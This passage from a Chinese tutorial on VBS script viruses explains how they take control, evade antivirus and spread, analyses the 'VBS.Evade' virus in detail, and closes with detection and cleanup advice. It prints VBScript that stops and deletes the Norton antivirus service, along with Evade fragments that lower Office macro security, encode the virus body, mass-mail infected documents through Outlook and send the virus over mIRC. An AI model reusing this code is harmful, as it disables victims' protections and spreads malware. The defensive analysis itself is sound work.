这种方式其实和用户的心理有关。譬如,病毒在发送附件时,采用双后缀的文件名,由于默认情况下,后缀并不显示,举个例子,文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg,这时用户往往会把它当成一张图片去点击。同样,对于用户自己磁盘中的文件,病毒在感染它们的时候,将原有文件的文件名作为前缀,vbs作为后缀产生一个病毒文件,并删除原来文件,这样,用户就有可能将这个vbs文件看作自己原来的文件运行。
5.3.4、 desktop.ini和folder.htt互相配合
这两个文件可以用来配置活动桌面,也可以用来自定义文件夹。如果用户的目录中含有这两个文件,当用户进入该目录时,就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt,还可能触发exe文件,这也可能成为病毒得到控制权的一种有效方法!
病毒获得控制权的方法还有很多,这方面作者发挥的余地也比较大。
第六章 VBS 病毒逃避杀毒软件的方法
脚本病毒以其编写的容易及代码公开性,造成流行非常广泛,而且变种繁多.当然杀毒软件对脚本病毒的查杀也是不遗余力.脚本病毒也开始用新的方法来对抗杀毒软件查杀!这里我就来说一下病毒常用的一些伪装方法.
6.1、脚本病毒进行加密,执行的时候进行解密!则病毒软件无法通过固定的特征码进行查杀!
脚本病毒的运行速度比较慢,因此决定了其加密算法不可能很复杂,通常没有人使用脚本来进行非对称加密算法的运算(例如RSA、ECC等算法),因为这样的话,要么执行的速度很慢,要么无法达到需要密钥的长度。所以脚本病毒的解密一般不是很困难。加密有两种,一种是只对特定的字符串进行加密;另一种做法是将病毒的可执行码通过简单的排列放入到一个字符串数组中,然后执行的时候按照一定的规律进行解码!比如,本程序的一个调用Set fso=createobject("scripting.filesystemobject")我们可以把scripting.filesystemobject进行加密解密成为:
Set fso=createobject(decr("thecryptedstuffherehereher")) 其中Decr()函是一个简单的解密函数。一种是整提加密,然后用解密程序进行执行.这样的程序进行破解时非常容易,只需要讲解密后的执行语句改为显示或是存到某个文件即可,这里不再详细论述.
6.2、脚本病毒运行时杀掉常用杀毒软件进程。
这样的病毒需要在杀毒软件没有查杀之前就要控制权限。但一般在实时监控的条件下,病毒很难发作。所以,病毒需要伪造正常的文件,它的文件内就不能有任何病毒的特征码,这样不受杀毒软件截获而得以正常执行,执行完后,杀掉杀毒软件进程,然后释放出病毒体。病毒体可以是任意的方法进行加密形成乱码!
On Error Resume Next
strComputer="." '.代表本地机器
SetobjWMIService= GetObject("winmgmts:"_&""{impersonationLevel=impersonate}!\\")"& strComputer & "\root\cimv2")'建立wmi连接
Set stopServiceList = objWMIWService.ExecQuery("Associators of"_
&"{Win32_Service.Name='Norton Antivirus Server'}where "_
&"AssocClass=Win32_DependentService"&"Role=Antecedent") '查询所有依赖norton antivirus server 的服务,并停止掉,在本例中norton服务是独立的,可以不需要 For each objService in stopServiceList objService.StopService() Next WScript.sleep 20000
Set removeServiceList = objWMIService.ExecQuery
("select * from Win32_Service where Name='Norton Antirus Server'")
For each objService in removeServiceList
errReturn = objService.StopService(0 '停止norton监控服务
objService.delete() '卸载norton服务
Next
经过试验,Norton完全不报警地让此VBS执行,然后停止了监控服务.
上面的程序很好理解,首先执行WMI的连接,然后查询系统名为"Norton Antivirus Server"的服务,然后停止,非常简单.
这里需要指出的是,这段代码对Norton企业版有效,因为在系统服务中Norton Antivirus Server,但是在Norton 2003 Professional中服务就不是这个名字,但在Norton产品中,其服务描述都有Norton或者Symantec字样,我们在改动一下,将所有正在运行的中的服务名称取出,然后看是否包含Norton或者Symantec,若包含,则停止其服务。当然国内其他杀毒软件厂商也可以通过采用相同的方法来停止其监控服务,但是瑞星不能,怀疑瑞星采用病毒技术来监视自身进程,当进程退出后自动重新打开监控。
第七章 防治VBS病的方法
7.1、 病毒的特点
在讨论VBS病毒的防治方法之前我们先仔细分析一下,VBS脚本病毒有以下几个特点:
1、编写简单,变种繁多。由于VBS脚本病毒是由VB语言编写的,所以即使你原来什么都不懂,也可以在很短的时间内研究学习,编写出一个属于自己的VBS脚本病毒。再加上它的结构比较简单,你只要弄到了它的源代码,稍加改动,一个新的VBS脚本病毒就从你手里诞生了。更有甚者,你可以使用一种叫"病毒生产机"的程序,以最快的速度制造出一个完全按照自己意愿来"工作"的病毒。
2、破坏性大,感染力强。VBS脚本病毒语言功能强大,直接调用Windows组件,可迅速获得对系统文件及注册表的控制权,这就使得一旦发作,即可造成大的破坏。如耗费系统资源、制造系统垃圾、滥发电子邮件、阻塞网络等。再加之脚本是直接解释执行的,使得它的感染变的非常简单,电子邮件、局域网共享、文件感染、IRC感染等都是它感染的良好途径。
3、欺骗性强,不易彻底消灭。编写良好的VBS脚本病毒本身就很善于伪装自己,它们想尽千方百计不引起杀毒软件及电脑使用者的注意,再加之一些别有用心的无聊之人的操作,如给邮件附件取双后缀名来欺骗电脑使用者,使得VBS脚本病毒传播变的隐蔽和容易。而且VBS脚本病毒的生命力十分顽强,使得它的彻底清除有了一定的难度。
7.2、 VBS病毒的弱点
1、VBS脚本病毒要通过WSH(Windows Scripting Host,Windows脚本宿主)来解释执行。
2、VBS脚本病毒的运行要其关联程序文件"Wcsript.exe"的支持。
3、VBS脚本病毒在网页上的传播要"Active控件及插件"的支持。
4、VBS脚本病毒通过电子邮件传播需要OE(OutLook Express,Windows自带的邮件服务程序)的支持。
7.3 、基本的防杀办法
针对VBS脚本病毒以上的特点,我们就可以对症下药地做好一些防范措施,把VBS脚本病毒的危害程度降到最低:
1、不可缺少的东西:杀毒软件。在病毒横行的网络上,一台没有杀毒软件的机子是不可思议的。即使有时候它的表现也不尽如人意(误报、漏报、杀毒不彻底等),但它至少给你提供了一个相对受保护的空间。需要说明的一点是,一款再出色的杀毒软件,如果不及时升级的话,也一样形同虚设,面对VBS脚本病毒的"铁蹄",它也逃不掉遭受"践踏"的命运。另外,病毒防火墙应该随机自启动。
2、不得不防的地方:局域网。经常有朋友在论坛发贴问"为什么我公司的机器中了'新欢乐时光',用专杀工具杀完后又重新感染,后来才发现杀毒时没有断开局域网连接,也没有关闭可写的共享,导致从局域网的其他机子上又很快重新感染。除非在必要的情况下,开可写的共享是一件非常危险的事情。VBS脚本病毒在局域网内的传播速度出奇的快,只要它感染了一台机子,不管被感染的是不是服务器,只要其他任何一台机子上开了可写的共享,它就可以以最快的速度对其进行感染。Windows2000开的共享默认就是可写的,一定要改为"只读"。
3、不得不出的杀手锏:治标治本。尽管VBS脚本病毒有那么多"可怕"的地方,但"一切病毒都是纸老虎"("非典"也不例外),病毒要生存也需要载体,它们也有致命的弱点,这就使得我们可以有效的做好防范工作。
首先,从系统中卸载WSH,切断VBS脚本病毒的执行条件。方法:"控制面板"----"添加/删除程序"----"Windows 安装程序"----"附件",把"Windows Scripting Host"前的勾去掉.
其次,从系统中清除掉Wscript.exe文件,使得VBS脚本病毒在执行时找不到其用来支持的关联程序。方法:删除Wscript.exe或为其改名。
然后,在浏览器中禁用Active控件及插件,使得网页内包含的VBS脚本病毒不能被执行。方法(只针对IE):打开IE,"工具"----"Internet 选项"----"安全"----"自定义级别",把"Active控件及插件"的一切选项设置为禁用(如图2)。这样还可以预防大部分的恶意网页的攻击。
最后,取消OE的自动发送邮件功能,切断VBS脚本病毒通过病毒电子邮件传播的途径;并且设置安全的邮件规则:若邮件带有附件,将它移动到指定的文件夹。方法:打开OE,"工具"----"邮件规则"----"邮件",在"选择规则条件"中选中"若邮件带有附件",在"选择规则操作"中选中"将它移动到指定的文件夹",然后在"规则描述"中选则好文件夹比如草稿夹。最后对该文件夹杀毒。
4、不得不注意的事项:养成两好的使用电脑的习惯。有资料显示,受过安全培训的员工,其公司的机子受黑客及病毒攻击成功的可能性远远低于没有受过培训的。所以养成良好的电脑使用习惯提高个人的网络安全意识是非常有必要的。针对VBS脚本病毒,我们在日常使用电脑时要注意那些方面的问题呢?
首先,让系统显示文件的扩展名,防止病毒欺骗电脑使用者。方法:"查看"----"文件夹选项"----"查看",把"隐藏已知文件类型的扩展名"前的勾去掉,确定(如图4)。(Windows2000下为"工具"----"文件夹选项"----"查看")。VBS脚本病毒经常把自身带毒文件取名为name.jpg.vbs,一不小心你就把它当成图片直接打开了。
其次,对邮件的附件要格外小心,无论是认识的朋友还是不认识的陌生人,他们发给你的邮件附件中都可能带有VBS脚本病毒或其他病毒或木马等(特别是不认识的陌生人)。一个比较有效的办法,就是先下载到本地,用杀毒软件先杀一遍。从网上下载的各种东西在执行前都要先杀毒,病毒库要及时升级。
最后,要十分警惕系统与平时不一样的地方及所表现出来的情况。服务器要经常作好备工作,以防不测。最好安装两种杀毒软件。
以上就是对VBS脚本病毒的简单分析及针对其特征的一些简单防范方法,红色代码在此抛砖引玉与各位共免,希望可以对各位电脑使用者有所帮助。可以看出VBS脚本病毒其实并不可怕,只要能对它有个比较正确和全面的认识,就可以有效地对它进行防范。
对付病毒,最重要的还在于防患未然、未雨绸缪,任何时候都要有很好的意识。这样保证你邂逅病毒的几率会大大降低。
第八章 典型的VBS病毒的工作方式举例
谈到vbs病毒的工作方式,我想在前面的叙述中大家已经了解一些了,现在我就以一个例子来详细叙述一下vbs病毒的运行方式。
例子:混合型脚本病毒"叛逃者(VBS.Evad)"病毒。
危害:该病毒不但能感染脚本文件、Excel和Word文档,而且还会直接覆盖一部分音乐、视频及工作文档。同时,"叛逃者"会通过E-mail到处发放已经被感染的Office文档,造成用户重要信息泄漏。
因此,该病毒危害极大。
8.1、该病毒的感染特征
叛逃者病毒属于VBS脚本病毒,同时也具有宏病毒的特征。当计算机感染该病毒后,会发生以下变化:
8.1.1、对注册表的修改
1、添加HKEY_MACHINE\Software\Mircrosoft\Windows\CurrentVersion\Run\Winsart,其值为Wscript.exe\Winstart.vbs%1,其中SYSDIR为系统目录。
2、修改HKEY_LOCAL_MACHINE\Software\X1.Application.Version\Excel\Security\LeHKEY_LOCAL_MACHINE\Software\X1.Application.Version\Excel\Security\AcessVBOM为1。
3、修改HKEY_LOCAL_MACHINE\Software\Wd.Application.Version\Excel\Security\Level和HKEY_LOCAL_MACHINE\Software\Wd.Application.Version\Excel\Security\AcessVBOM为1。
在HKEY_CURRENT_USER\Software\Zed/[rRlf] \VBS/Evade\RecordContacts\键下会建立相应的E-mail发送结果记录。
添加键值HKEY_CURRENT_USER\Software\Zed/[rRlf]\VBS/EvadeVBS/Evade.A by Zed[rRlf]
8.1.2、添加文件
该病毒运行后,会在用户的Windows目录添加如下两个病毒文件:Netlnk32.vbs,Conversation.vbe;会在用户系统目录夏天家如下四个病毒体文件:Winstart.vbs,Wininst32.vbs,Winnt32.vbs,Winnet32.vbs;会在磁盘根目录添加evade.gif,evade,jpg,这两个文件是用来载入到Excel和Word的病毒文件的副本,它们不同前面的几个病毒体文件。
1、对文件的修改
如果存在personal.xls文件,则原有文件将被删除,并且建立新的personal.xls文件;否则,直接建立personal.xls文件。同时病毒也对Word的模板进行感染。如果存在MIRC,则修改Script.ini文件。
2、被感染的文件类型
病毒会对.vbs,.vbe、文件进行感染,同时也会用病毒对9个目录下的所有后缀为.mp3,.mp2,.avi,.mpg,.mpeg,
.mpe,.mov,.pdf,.doc,.xls,.mdb,.ppt,.pps的11种数据文件进行覆盖。
8.2、病毒的危害及传染途径
病毒不对系统进行任何破坏,但是覆盖用户常用的一些宝贵的数据如mp3,mpg,avi,doc,pdf,mdb,ppt等文件。这种破坏是不可逆的,并且病毒在借助去传播时并没有为这些宝贵的数据留下副本。同时病毒还会自动通过E-mail到处发送用户的Office文档,泄露用户的数据信息,造成内部文档被泄露,造成非常重大的经济损失或其他不良影响。
该病毒用到了几乎现行所有脚本的病毒曾经用过得的传播方式:文件感染、E-mail传播、IRC通道传播、各种点多点共享工具(KaZza、Morpheus、Grokster、Bearshare、Edonkey)的传播,同时也采用了宏病毒的传播方式:通过模板、文档文件进行感染。
8.2.1、病毒感染试验
1、在服务器上安装Windows2000 Server,注意不要安装不补丁程序,以模拟实验环境保证病毒可以正常入侵。
2、在Windows 2000 Server服务器上点击带有VBS病毒的邮件附件。
病毒一般会生成以一下标题的信件:
"Here is that file "
" Important file"
"The file"
"Word file"
"The file you wanted"
"Here is the file"
邮件内容为:
"The file I am sending you is confidential as well al important;so don't let anyone else have a copy"
邮件的附件是被感染的得当前病毒文档,当打开病毒文件时,病毒便开始运行。
3、此后,当浏览一个信任的网站时,会发现打开每个文件夹的速度非常慢,这说明系统已经被感染?
8.2.2 、病毒运行的流程
(1)复制病毒文件到用户Windows目录和系统目录。
(2)修改注册表,改变Excel的安全级别。
(3)写病毒代码到Evade.gif,并将Evade.gif 导入到Personal.xls
(4)修改注册表,改变Word的安全级别。
(5)写病毒代码到Evade.jpg,并将该文件导入到Word通用模板。
(6)搜索整个磁盘,在每个盘符(C盘除外)根目录下创建副本Passwords.vbs。
(7)感染硬盘上的所有.VBS .vbe文件
(8)对指定9个目录进行再次搜索,用病毒文件覆盖条件满足条件(指定11种后缀)的文件。
(9)如存在Mirc,修改Script.ini,使其可以通过Mirc聊天通道发送病毒文件Conversation.vbe。
(10)修改注册表,表明病毒作者信息及版本
为逃避杀毒软件的追杀它采用了加密机制:
8.2.3 、该病毒的解密函数如下:
Function E0 (E1)
For E2 = 1 To Len(E1) E3 =Mid(E1,E2,1)
If Not Asc (E3) mod 2 = 0 The //E3 的]Ascii 码是否为奇数
E3 = Chr(Asc (E3) -1) //是
Else
E3 = Chr(Asc(E3)+1) //否
Endif
E0 =E0 & E3 //整合已经处理的字符
Next //继续,直到整个字符串处理完毕 End Function。
这个函数具有如下作用:对于给出的字符串E1,对于E1中的每个字符,如果该自负的Ascii码为X为奇数那么用Ascii码值为X-1的字符代替这个字符,否则,用Ascii码值为X+1的字符串代替这个字符。也就是说一个字符要么用它前面的字符代替,要么用它后面的的字符代替。例如,F的Ascii码为70,那么F的Ascii码为70,那么F将被71的字符G代替,G将被F代替。那么对于病毒中的的加密字符串Rbshquhof/GhmdRxrudlNckdbu,解密后的代码就是:Scripting.FileSystemObject。
同时,由于上面F到G的相互转换,我们可以发现,一个字符经过该函数两次处理之后会还原。其实这个函数也是该病毒的加密函数!
另外这个病毒要像正常发挥出它的威力还要进行:对Excel的修改,对Word的修改,往Gif,Jpg写入病毒主体等步骤,因为篇幅的原因我这里只给出往Gif,Jpg写入病毒主体代码是采取的方法
病毒在往evade.gif,evade,jpg文件中写入的病毒是直接的VBS代码,这段代码写入时是通过一段转换代码处理过的,该代码将病毒体的字符串转换为每个字符Ascii码串(其中Ascii码以16进制表示)。其具体代码分析如下:
For i =To Len (ScriptRead)
Tz = Mid (ScriptRead, i,1)
Tz =Hex(Asc(Tz))
//取字符的Ascii码,并将其转化为16进制串
If Len (Tz) =1 Then
//如果该字符串的Ascii码小于等于F,譬如回车换行 D ,A
If = E0("1") & Tz
//在字符串前面加0,譬如,将D转换为0D,补足两个字符,便于后面逆向处理
Gz = Gz + Tz //整合处理过的字符
If Len(Gz) = 110 Then
//如果处理的字符串达到110个字符文件(其实是55个字符,因为一个字符转换成16进制的Ascii码时后两位)
EM.WriteLine "Tz = Tz + "" + Gz + Chr(34)
//将处理过的110个字符写入文件,实际写到文件的字符串Tz = Tz+"处理的110个字符串
Gz = E0 ("") //将Gz清空,以便继续处理
Endif
If Len (SCriptRead) –i =0 Then // 如果所有字符字符已经处理完
EM.WriteLine "Tz = Tz + "" + Gz+Chr (34) " //将剩余处理过的字符串写入文件
Gz = E0("")
Endif
Next
通过上面的分析,我们可以看出任何一种VBS病毒都回各种方式来逃避杀毒软件的查杀,这就是为什么好多病毒在一开始时非常难杀的原因了!
8.2.4、 对Excel所作的修改
病毒对Excel作修改的代码分析如下:
XlKey = "HKCU\Software\Microsoft\Office\" & Xl.Application.Version & "\Excel\Security")
wsc.RegWrite XlKey & "Level", 1, "REG_DWORD"wsc.RegWrite XlKey & "AcessVBOM", 1, "REG_DWORD" '这里是写入注册表,修改Excel的安全等级……
Xl.Visible = False
Xl.WorkBooks.AddXl.ActiveWorkbook.VBProject.VBComponents.Import (fso.GetSpecialFolder(1) & "\Evade.gif")
'导入Evade.gif中的病毒代码
Xl.ActiveWorkbook.SaveAs (Xl.Application.StartupPath & "\Personal.xls")
'将Evade.gif的内容保存到Personal.xls文件
Xl.Quit
可见,通过上面这段程序,病毒将病毒代码写入到了Personal.xls,这样以后打开Excel时就会自动执行另外一段病毒代码。这段病毒代码后面会加以分析。
8.2.5、对Word所作的修改
病毒对Word作修改的代码分析如下:
WdKey = "HKCU\Software\Microsoft\Office\" & Wd.Application.Version & "\Word\Secutiry\"wsc.RegWrite WdKey & "Level"), 1, "REG_DWORD")
wsc.RegWrite WdKey & "AccessVBOM", 1, "REG_DWORD")
'这里是写入注册表,修改Word的安全等级Wd.Options.VirusProtection = False '关闭病毒保护功能
Wd.Options.SaveNormalPrompt = False '自动保存模版,不给用户提示
Wd.Options.ConfirmConversions = False '不给出确认信息……
If Wd.NormalTemplate.VBProject.VBComponents.Item("Evade").Name <> "Evade") Then
Wd.NormalTemplate.VBProject.VBComponents.Import SysDir & "\Evade.jpg")
Wd.NormalTemplate.VBProject.VBComponents.Item("Evade")).Name = "Evade")
'将Evade.jpg的内容保存到Word通用模版
End If
可见,通过上面这段程序,病毒将病毒代码写入到了Word通用模版,这样以后打开Word时也会自动执行另外一段病毒代码。这段病毒代码后面也会加以分析。
8.2.6、 往Gif,Jpg文件中写入病毒主体代码时采取的方法
病毒在往evade.gif,evade.jpg文件中写入的并不是直接的vbs代码,这段vbs代码写入时是通过一段转换代码处理过的,该段代码将病毒体的字符串转换为每个字符Ascii码串(其中Ascii码以16进制表示)。其具体代码分析如下:
For i = 1 To Len(ScriptRead)
Tz = Mid(ScriptRead, i, 1)
Tz = Hex(Asc(Tz))
'取字符的Ascii码,并将其转化为16进制串
If Len(Tz) = 1 Then
'如果该字符的Ascii码小于等于F,譬如回车换行D,A
Tz = E0("1") & Tz
'在字符前面加0,譬如,将D转换为0D,补足两个字符,便于后面逆向处理
End If
Gz = Gz + Tz '整合处理过的字符
If Len(Gz) = 110 Then
'如果处理的字符串达到110个字符(其实是55个字符,因为一个字符转换成16进制Ascii码后是两位)
EM.WriteLine "Tz = Tz + """ + Gz + Chr(34) '将处理过的110个字符写入文件,实际写到文件的是字符串Tz=Tz+"处理过的110个字符"
Gz = E0("") '将Gz清空,以便继续处理
EndIf
If Len(ScriptRead) - i = 0 Then '如果所有字符已经处理完
EM.WriteLine "Tz = Tz + """ + Gz + Chr(34) '将剩余处理过的字符串写入文件
Gz = E0("") '将Gz清空
End If
Next
8.2.7、 病毒的感染部分
叛逃者病毒会对整个磁盘进行搜索,寻找满足条件的文件,其搜索代码和爱虫病毒的搜索代码基本上是一模一样,同样是搜索到每个盘符后,先检查该盘符是否软磁盘或硬盘,如果是则对其进行递归、搜索每个文件夹,查找每个满足条件的文件,由于版面关系这里不再列出具体代码。不过这段搜索代码在找到C盘后,会在磁盘(C盘除外)根目录下创建一个名为passwords.vbs的病毒副本,这个文件名诱惑用户双击该文件,执行病毒代码。相关代码如下:
If UCase(NetDrive.Path) <> "C:" Then
fso.CopyFile WScript.ScriptFullName, NetDrive.Path & "\Passwords.vbs")
End If
病毒为了避免反复感染同一个文件,会先查看该文件中是否含有病毒标记" ' VBS/Evade by Zed /[rRlf]",如果存在则不对其进行感染。这里病毒并没有对目标文件进行覆盖,而是将病毒代码写在了原来文件的末尾,并且这里写入的也是转换成16进制Ascii码后的病毒代码,紧接其后病毒写入了逆向转换代码和调用执行语句。
另外,病毒还会对指定9个目录:
C:KazaaMy Shared Folder
C:My Downloads
C rogramFiles%KazaaMy Shared Folder
CrogramFiles%KaZaA LiteMy Shared Folder
CrogramFiles%BearshareShared
CrogramFiles%Edonkey2000
CrogramFiles%MorpheusMy Shared Folder
C:ProgramFiles%GroksterMy Gorkster
C:ProgramFiles%ICQShared Files
进行搜索,并对.mp3 .mp2 .avi .mpg .mpeg .mpe .mov .pdf .doc .xls .mdb .ppt .pps等13种数据文件,进行覆盖:先创建一个以原文件名为前缀,vbs为后缀的病毒文件副本。然后,删除原来的文件。这样,用户在看到这些文件后,会以为这些文件是用户原来的文件而去双击它。这样病毒就得到了控制权。以上9个目录是网上进行文件共享时的默认目录,如果病毒覆盖了这些病毒中的文件,其它网络用户就会下载这些文件,这样病毒就得以广泛传播。这里不列出具体代码分析。
8.2.8、 利用Mirc进行传播
叛逃者病毒可以利用Mirc聊天通道进行传播,他修改script.ini文件,使得Mirc会自动向通道中的其他好友发送病毒文件。病毒依次查找如下四个目录:
C:\Mirc
C:\Mirc32
\Mirc
\Mirc32
如果发现这些目录,则在该目录中添加或修改文件Script.ini,并在其中写入一些控制指令。这些指令可以自动往通道中的其他用户发送病毒文件。添加的指令如下:
;Mirc Scripting utility –do not modify
[Script]
n5=no 1:join:# ;{
n6=/if ($nick= =$me) {halt}
n7=/msg $nick Remember this funny conversation I had on IRC?
n8=/dcc send –c $nick WinDir \Conversation.vbe
n9=}
8.3、 两个"图片"文件的代码分析
8.3.1 、evade.gif文件
该文件是要被导入到personal.xls文件中的病毒副本。该病毒副本首先修改Excel安全等级,并建立一个Auto_Open函数,该函数只有一条调用osaEvade过程的语句。OsaEvade是病毒发作部分。我们知道Auto_Open函数在用户打开文档时是会自动执行的。这样,每次打开Excel文档时,病毒就会获得控制权。这也是宏病毒常用的手段。同时,病毒还做了一些基本的隐蔽措施,如下所示:
Application.ScreenUpdating = False '不让屏幕更新,让病毒执行时不影响计算机速度
Application.DisplayAlerts = False '不让Excel弹出报警信息
Application.EnableCancelKey = xlDisabled '使不可以通过Esp键取消正在执行的宏Application.DisplayStatusBar = False '不显示状态栏,以免暴露病毒的运行情况
同时,病毒还会检查相应目录下是否存在personal.xls,Winstart.vbs,如果不存在,马上以evade.gif文件为样本创建这两个文件。
在这个文件中最重要的一个步骤就是从当前outlook中的电话簿中找到email地址,并发送带毒office文档。部分代码分析如下:
EmailKey = "HKEY_CURRENT_USER\Software\Zed/[rRlf]\VBS/Evade\RecordContacts\"
ReadIfSent = wsc.RegRead(EmailKey & ContactSwitch.AddressEntries(UserGroup)) '从注册表中读取信息,看是否已向该邮件地址发送过?
If ReadIfSent <> "File Sent" Then '如果没有发送过,则继续
Set OutlookEmail = OutlookApp.createItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup) '收件人
OutlookEmail.Subject = L6 '邮件标题,该标题是从7个标题中随机选取的
OutlookEmail.Body = "The file I am sending you is confidential as well as important; so don't let anyone else have a copy." '邮件内容
OutlookEmail.Attachments.Add ActiveWorkbook.FullName '邮件附件,这里贴上的是染毒的office文档,因此会造成文件泄露
OutlookEmail.Importance = 2 '文件重要等级
OutlookEmail.deleteAfterSubmit = True '发送后自我删除
OutlookEmail.Send '发送邮件
wsc.RegWrite EmailKey & ContactSwitch.AddressEntries(UserGroup), "File Sent" '在注册表中记录,以免重复发送
End If
另外该文件中含有一个非常重要的转换函数,前面讲过主病毒文件被写入到这个文件时是经过Ascii码转换的。要让这段代码写入到Winstart.vbs中能执行,这里就需要对其做恢复转换。这个函数如下所示:
Function CM(CN)For GC = 1 To Len(CN) Step 2 '以两个字符为单位,因为一个字符转换成10进制Ascii码后时为两个字符 CM = CM & Chr("&h" & Mid(CN, GC, 2)) '譬如A的Asii码为65,转换为16进制为41,这里就是将41转换成字符ANextEnd Function
8.3.2、 evade.jpg文件
这个文件开始是用于导入到Word通用模版的。该病毒副本同样修改了Word安全等级,并创建了AutoClose,AutoOpen,ViewVBCode,Evade过程。其中,Evade过程中是病毒表现代码。前两个在Word关闭,打开文件时会自动执行,并且这两个过程均调用了Evade过程。这里ViewVBCode过程中没有任何语句,这样,当用户按ALT+F8后就不会调出宏编辑窗口,而是不做任何动作。这从某种程度上保护了病毒程序不被他人分析。
另外,和evade.gif文件一样,病毒也做了一些基本的隐蔽措施,如下所示:
Application.DisplayStatusBar = 0 '不显示状态栏,以免暴露病毒的运行情况
Application.ScreenUpdating = 0 '不让屏幕更新,让病毒执行时不影响计算机速度
Application.EnableCancelKey = wdCancelDisabled '使不可以通过Esp键取消正在执行的宏
Application.DisplayAlerts = wdAlertsNone '不让Excel弹出报警信息
CommandBars("Tools").Controls("Macro").Enabled = 0 '屏蔽工具菜单中的"宏"
CommandBars("Macro").Controls("Security...").Enabled = 0 '屏蔽宏菜单的"安全性…"
CommandBars("Macro").Controls("Macros...").Enabled = 0 '屏蔽宏菜单的"宏…"
CommandBars("Tools").Controls("Customize...").Enabled = 0 '屏蔽工具菜单的"自定义…"
CommandBars("View").Controls("Toolbars").Enabled = 0 '屏蔽视图宏菜单的"工具栏"
CommandBars("format").Controls("Object...").Enabled = 0 '屏蔽格式菜单的"对象"
这样,病毒通过这些设置就可以防止用户通过对word进行一些设置查看和解除宏病毒代码。
另外,其它部分和evade.gif文件功能基本上一样。该文件同样含有email发送代码和恢复转换函数,并且原理一模一样,这里不在具体叙述。
第九章 典型的VBS病毒的防治方法
9.1、计算机中毒后的表现
如何来判断计算机是否被病毒感染呢?最简便且行之有效的方法当然是利用各种杀毒软件或防病毒卡来检验计算机是否染毒。应该做到定时查杀,常备不懈。如果没有配备相应的反病毒产品,则可通过如下途径初步判断计算机是否感染了病毒。 1.程序突然工作异常。如文件打不开,word97、excel97出现"宏"警示框(用户无自编"宏"的情况下),死机等。
2.文件大小自动发生改变。
3.更换软盘后,列表时内容不变。
4.检查内存,基本内存小于640k(某些机型小于639k)。
5.windows出现异常出错信息。
6.用与硬盘相同版本的系统盘从a驱引导后找不到硬盘。
7.运行速度变慢。
8.以前运行正常的程序运行时出现内存不足。
9.系统无法启动。
出现以上情况之一可怀疑是病毒所为,但最终确认最好是请专业反病毒公司协助。
9.2、 典型病毒的防治方法
9.2.1、 解决叛逃者病毒
由于叛逃者病毒不仅感染了vbs脚本文件、覆盖了其它类型的文件,同时也感染了Word,Excel,因此该病毒在解除过程中不得运行脚本文件,也不得对Word,Excel进行操作。
下面简要谈一下这个病毒的解除思路:
1.按照上面所提到的部分删除或者改回被修改过的注册表键值。
2.删除上面提到的9个目录中的所有被感染文件、evade.gif、evade.jpg、Personal.xls,\Passwords.vbs。还有windows和系统目录下的5个vbs、1个vbe文件。
3.查找被感染的vbe,vbs文件,编辑,并删除文件后面的病毒代码。
4.对Excel和Word进行解毒,并且还要杀除已被感染文档中的病毒。
5.如果有Mirc,还需修改Script.ini文件,删除后来添加的几个命令行。
上面有些步骤比较复杂,建议一般用户采用杀毒软件进行杀毒。
9.2.2、 解决世界杯病毒
世界杯(Script.WorldCup)病毒档案
人们在欣赏世界杯精彩比赛的同时,是否想到有一个阴影迅速向用户扑来,而这个阴影恰恰是利用了世界杯这一主题。世界杯硝烟未尽,病毒又挟势而来,希望广大的计算机用户提高警惕。
病毒介绍:
此病毒被瑞星公司率先截获,这是国内发现的第一个利用世界杯热潮传播的恶意网络脚本病毒!该病毒利用人们对世界杯决赛结果的兴趣,通过邮件系统给用户发送一封标题为:"FIFA World Cup 2002", 内容为:"Invite you to guess the world cup champion the brigade,$50000 thousand big price waiting you take! They are Brazil,England,German,Spain."(邀请你猜测世界杯冠军队,5千万美元大奖等你拿,它们是:巴西、英国、德国、西班牙), 附件为:"football.html.vbs"的病毒邮件,用户一旦点击,病毒便会运行。病毒运行时,会将自身拷贝到WINDOWS的安装目录下的 "football.html.vbs"文件中,然后修改注册表,把自己放入自启动项。下次启动计算机时,病毒会自动启动并向外界不断地发送病毒邮件,此病毒还会利用MIRC网络聊天工具覆盖机器中所有扩展名是 .vbs 和 .vbe 文件的文件内容
解决方案:
查找硬盘,看是否有"football.html.vbs"的文件,如果有,则将此文件直接删除。
查看注册表的HKEY_LOCAL_MACHINE\ SoftWare\Microsoft\Windows\CurrentVersion\Run\Winupdate项中是否有"wscript.exe"的键值,如果有,看此键值的内容是否有与"football.html.vbs"相关的内容(例如此键值的内容为:c:\windows\football.html.vbs),如果有此内容,则将"wscript.exe"键值删除即可。
查看邮箱中的邮件,如果有标题为:"FIFA World Cup 2002"的信件,而且还有附件,最好将此邮件删除。
9.2.3、 解决垃圾桶II(Worm.Lentin.e)病毒
病毒介绍:
此病毒是垃圾桶病毒的一个新一代变种,此病毒在第一代基础上更加完善。病毒进入被感染机器后,会把自己藏入回收站。并将病毒文件设为隐藏属性,防止被用户发现。病毒可以杀掉大多数国外杀毒软件的主程序,使人们即使拥有了这些杀毒软件,也无法除掉病毒。病毒会感染所有Windows平台,包括NT系列系统,然后查找用户的地址本、向外乱发病毒邮件,严重阻塞网络。病毒会破坏被感染机器的注册表,将导致用户计算机的许多功能无法使用,同时会使被感染的计算机运行速度越来越慢,最终导致死机。病毒发作时屏幕上会出现很多内容为:"Ur My Best Friend"的的句子, 这些句子可以不停地变幻形态,干扰用户使用计算机。
解决方案:
先将浏览器设置为"显示所有文件和文件夹",具体方法,如果使用的是NT系列系统,可以选择:"工具\文件夹选项\查看"菜单;如果使用的是9X系列系统,可以选择"查看\文件夹选项\查看"菜单";选中其中的"显示所有文件和文件夹"项即可
进入回收站文件夹,看是否存在可疑文件,因为病毒生成的文件名是随机的,所以无法确定病毒的名字,但有一个好办法,就是先将回收站清空,然后再进入回收站看是否有名字比较怪的.exe文件,这个就应该是病毒了,直接删除即可,如果无法删除,则很可能病毒已经运行,可在DOS环境下删除。
由于此病毒会修改用户的注册表,如果用户的注册表已经被病毒修改,则可以到瑞星网站上下载网页病毒清除工具进行恢复。
9.2.4、 解决求职信病毒
病毒介绍:Klez.f是一种恶意使用IE安全漏洞的病毒。在使用基于IE模块的邮件软件(Outlook/Outlook Express等)的情况下,有可能仅仅打开邮件浏览一下感染并执行这种病毒。
